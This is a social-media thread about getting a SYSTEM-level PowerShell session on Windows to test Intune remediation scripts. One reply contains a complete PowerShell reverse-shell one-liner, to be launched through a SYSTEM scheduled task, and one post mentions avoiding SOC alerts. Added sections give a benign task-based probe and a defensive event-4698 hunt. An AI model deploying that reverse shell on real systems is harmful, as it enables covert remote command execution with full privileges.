Conversation

Why is it so hard to get an interactive console as NT Authority#SYSTEM?!

3
0
0

@sassdawe I know psexec -s is a default answer, but I guess your whole point was using native PowerShell.

Looks like a job for a revshell!

First I found a listener here:

https://gist.github.com/staaldraad/8473da7f2dfed28b2216b15ca6ebad11

Run that in one window.

Then saved this revshell as a file:

$LHOST = "127.0.0.1"; $LPORT = 413; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()

Create a Scheduled Task that runs as SYSTEM and runs it.

1
0
0

@sassdawe Because there is no need to run anything as SYSTEM if you as administrator of the OS do your job properly. Otherwise you can always rely on Sysinternals tools.

1
0
0

@Brokar I agree, I don't like that I need to use SYSTEM. But remediation tasks run as SYSTEM when you need admin rights, and as part of the developer workflow you kind of need to test with SYSTEM to make sure your script will also execute properly when distributed by Intune.

1
0
0

@jsmall you know that I am not going to run this, do you? 😁

I ended up using the Invoke-CommandAs module, because it has an -AsSystem parameter which does exactly that: it creates a Scheduled Task as SYSTEM, and I can use Enter-PSHostProcess to jump into that scheduled task and run my code.

My frustration comes from the fact that Admin to System is not a security boundary when it comes to Bug Bounties, so then why is this so hard to do?

1
0
0

@sassdawe but that wouldn't require an interactive shell. That just would require a scheduled task running as SYSTEM. And that's an easy one to create.

2
0
0

@Brokar Ideally, yes.

But I am stuck with LAPS, so I first need to go from my normal account to the LAPS admin account, and from there to SYSTEM. Without actually typing that stupid admin password into the UAC prompt.

0
0
0

@sassdawe Also keep in mind that SYSTEM has no profile of its own, so many things you'd expect in a user environment don't exist there. That would make using an interactive shell more prone to produce errors than running the script in a scheduled task, which would simulate the same environment Intune finds when it runs.

1
0
0
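An added example, not code posted in this thread, that does what Brokar describes in the two posts above: it registers a scheduled task with a SYSTEM principal, runs a small probe script through it and collects the output, so a developer can see the environment an Intune remediation script actually gets (no profile, different TEMP) without needing an interactive shell. The script and log paths are placeholders, and it assumes an already elevated session (the LAPS admin account), which registering a task with a SYSTEM principal requires.

```powershell
# Added example: test a script under NT AUTHORITY\SYSTEM via a one-shot scheduled task.
# Placeholders: $ScriptPath and $LogPath can be any location SYSTEM and you can both write to.
$ScriptPath = 'C:\Temp\SystemProbe.ps1'
$LogPath    = 'C:\Temp\SystemProbe.log'
$TaskName   = 'Test-SystemProbe'

New-Item -ItemType Directory -Path (Split-Path $ScriptPath) -Force | Out-Null

# Probe script (single-quoted here-string so nothing is expanded before it runs as SYSTEM).
# It records the facts that usually break scripts when they move from a user context to SYSTEM.
$ProbeScript = @'
"User:        $([Security.Principal.WindowsIdentity]::GetCurrent().Name)"
"USERPROFILE: $env:USERPROFILE"
"TEMP:        $env:TEMP"
"PS version:  $($PSVersionTable.PSVersion)"
"64-bit host: $([Environment]::Is64BitProcess)"
"HKCU keys:   $((Get-ChildItem HKCU:\ -ErrorAction SilentlyContinue).Count)"
'@
Set-Content -Path $ScriptPath -Value $ProbeScript

# Run the script non-interactively and capture every output stream to the log file,
# because a SYSTEM task has no console you could read from.
$Action = New-ScheduledTaskAction -Execute 'powershell.exe' `
    -Argument "-NoProfile -NonInteractive -ExecutionPolicy Bypass -Command `"& '$ScriptPath' *> '$LogPath'`""

# LocalSystem principal; ServiceAccount logon type means no password is stored with the task.
$Principal = New-ScheduledTaskPrincipal -UserId 'SYSTEM' -LogonType ServiceAccount -RunLevel Highest

# Do not let the default power settings or a hung script keep the task around.
$Settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries `
    -ExecutionTimeLimit (New-TimeSpan -Minutes 10)

Register-ScheduledTask -TaskName $TaskName -Action $Action -Principal $Principal -Settings $Settings -Force | Out-Null
Start-ScheduledTask -TaskName $TaskName

# Wait until the task has finished (it passes through Queued and Running).
do {
    Start-Sleep -Seconds 1
    $State = (Get-ScheduledTask -TaskName $TaskName).State
} while ($State -in 'Queued', 'Running')

$Info = Get-ScheduledTaskInfo -TaskName $TaskName
"Task exit code: $($Info.LastTaskResult)"
Get-Content -Path $LogPath

# Clean up so the test task does not linger as a SYSTEM persistence point.
Unregister-ScheduledTask -TaskName $TaskName -Confirm:$false
```

The probe output is what to compare against a run from a normal user session: USERPROFILE and TEMP point into the system profile, HKCU is SYSTEM's own hive rather than the user's, and the 64-bit line matters because Intune can run scripts in the 32-bit host depending on the script's settings, so a module path that works here may still fail there.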

@sassdawe I mean I know, but it was fun to put together.

1
0
0

@jsmall haha

I also need to not trigger any alerts at the SOC.

1
0
0

@jsmall That said, I am surprised that someone impersonating the SYSTEM has not triggered anything. 🤔

1
0
0

@sassdawe I wonder if it logs something I could hunt for.

0
0
0
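As an added example, not from the thread, of what jsmall's hunt could look like on a single host: every technique discussed above (psexec -s, a scheduled task, Invoke-CommandAs -AsSystem) either registers a task or installs a service, and the Security log records a task registration as event 4698, including the full task XML in the TaskContent field. The function below pulls those events, parses the principal out of the task XML and reports the ones that run as LocalSystem together with who created them and what they execute. It assumes the "Audit Other Object Access Events" subcategory is enabled for Success, since 4698 is not written otherwise; the -Days parameter belongs to this helper, not to any built-in cmdlet.

```powershell
# Added example: find scheduled tasks registered to run as SYSTEM in the local Security log.
# Event 4698 = "A scheduled task was created". Requires the Other Object Access audit
# subcategory (Success) to be enabled; the function returns nothing if it is not.
function Find-SystemTaskRegistration {
    param([int]$Days = 7)

    $events = Get-WinEvent -FilterHashtable @{
        LogName   = 'Security'
        Id        = 4698
        StartTime = (Get-Date).AddDays(-$Days)
    } -ErrorAction SilentlyContinue

    foreach ($e in $events) {
        # Flatten the <Data Name="..."> elements into a hashtable for easy lookup.
        $x = [xml]$e.ToXml()
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }

        # TaskContent is the task definition XML itself; the principal lives under Principals/Principal.
        [xml]$task  = $d['TaskContent']
        $principal  = $task.Task.Principals.Principal
        $userId     = [string]$principal.UserId

        # S-1-5-18 is the well-known SID of LocalSystem; tasks created through the cmdlets
        # or schtasks may carry the SID or one of the display names.
        if ($userId -in 'S-1-5-18', 'SYSTEM', 'NT AUTHORITY\SYSTEM') {
            $exec = $task.Task.Actions.Exec
            [pscustomobject]@{
                Time      = $e.TimeCreated
                CreatedBy = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"
                TaskName  = $d['TaskName']
                LogonType = [string]$principal.LogonType
                Command   = ("$($exec.Command) $($exec.Arguments)").Trim()
            }
        }
    }
}

# Review the last week; a developer testing remediation scripts shows up here with the
# same fingerprint as an attacker escalating from admin to SYSTEM, so context (who, when,
# what command) is what separates the two.
Find-SystemTaskRegistration -Days 7 | Sort-Object Time | Format-Table -AutoSize
```

A task registered by Invoke-CommandAs -AsSystem or by hand will appear here with the creating admin account (the LAPS account in this thread) in CreatedBy and a powershell.exe command line in Command; jsmall's reverse-shell variant would show the same shape with the saved script as the argument. For a fleet-wide version, point the same parsing at the centrally collected 4698 events, and enable the Microsoft-Windows-TaskScheduler/Operational log (event 106, "Task registered") as a second source on hosts where the Security audit policy cannot be changed.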